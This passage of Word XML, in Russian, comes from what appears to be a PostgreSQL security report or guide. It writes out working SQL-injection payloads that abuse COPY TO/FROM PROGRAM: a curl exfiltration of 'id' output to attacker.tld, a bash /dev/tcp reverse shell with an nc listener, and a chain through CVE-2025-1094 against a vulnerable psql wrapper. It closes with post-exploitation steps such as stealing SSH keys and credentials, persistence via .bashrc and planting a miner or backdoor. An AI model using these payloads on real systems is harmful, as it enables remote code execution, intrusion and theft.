        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>, передать вывод через base64 в URL атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69BF73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `table`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E25D44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520E647" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2EECD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*), pg_table_size('users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --') FROM users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540ACAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через стакинг исполняются две команды: первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает с ошибкой (некорректный аргумент в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_table_size</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но это уже не важно — вторая команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY (SELECT '') TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запускает curl на сервере. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$(id|base64 -w0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерполируется bash-ом до выполнения curl, в URL уходит base64 от вывода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D4801" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D30426D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71375F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># или быстрее — Burp Collaborator / interactsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566274E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — reverse-shell через FROM PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEB579" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Полноценный интерактивный shell под пользователем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884D081" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `table`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3FADEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users; CREATE TEMP TABLE _x(x text); COPY _x FROM PROGRAM 'bash -c "bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1"' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFEE08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B84B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*), pg_table_size('...payload...') FROM users; CREATE TEMP TABLE _x(x text); COPY _x FROM PROGRAM 'bash -c "bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1"' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE67B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TEMP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужен потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY tablename FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует существующую таблицу (в отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY (SELECT...) TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>). TEMP-таблица исчезнет в конце сессии — никаких следов в схеме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DCF900" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349269C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785ADC3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># далее интерактивный shell, права — postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF87B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — chain CVE-2025-1094 (R6) → COPY TO PROGRAM (R3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC57D6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production-сценарий, где приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не использует напрямую драйвер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql -c "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через subprocess, и пользовательский ввод проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (libpq escape). CVE-2025-1094 ломает escape через invalid-UTF-8: специально сформированная байтовая последовательность остаётся в кавычках для escape-функции, но в psql интерпретируется как закрытие литерала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59697631" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый враппер:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE82D76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># admin/backup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24E4C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15698920" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from psycopg2.extensions import adapt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE5A82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA2E472" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def export_table(table: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D22E498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    escaped = adapt(table).getquoted().decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA88CBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    subprocess.run(["psql", "-h", DB_HOST, "-c",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532BE954" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    f"COPY {escaped} TO STDOUT WITH CSV"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A31E0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (упрощённо, реальный CVE-2025-1094 payload — invalid UTF-8 byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC486BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users\xC0'; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(id)'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70717BA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>После encoding-bypass в psql escape ломается, payload интерпретируется psql как:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA115E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY users; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(id)'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1F1CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполнена с правами роли, под которой psql коннектится — если это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (как часто бывает в backup-скриптах), то </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не нужен — это уже superuser. Детальный разбор CVE-2025-1094 — в 4.5 (Хронология 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335DF66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В каждом из трёх payload — исполнение произвольной shell-команды на сервере PostgreSQL под OS-пользователем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (типично — UID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, домашняя директория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Из этой точки атакующий может: читать всю файловую систему, доступную </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая SSH-ключи, креды в env); писать в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для persistence; читать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и переписывать его (если права позволяют) для последующего trust-auth; коннектиться к internal services как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>-host; запускать майнер/бэкдор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8200E"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COPY ... FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверная фича, документированная функциональность PostgreSQL. Команда передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen("cmd", "r")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen("cmd", "w")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> backend-процесса. Shell-интерпретация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&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) делается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который popen() использует по умолчанию. Никакой санитизации, никакого whitelisting — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>админская команда</w:t>
      </w:r>
      <w:r>
        <w:t>, защита перенесена на уровень привилегий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C825DF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B1B35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY ... FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавлен в PG 9.3 (2013). Поведение стабильное.</w:t>
      </w:r>
    </w:p>
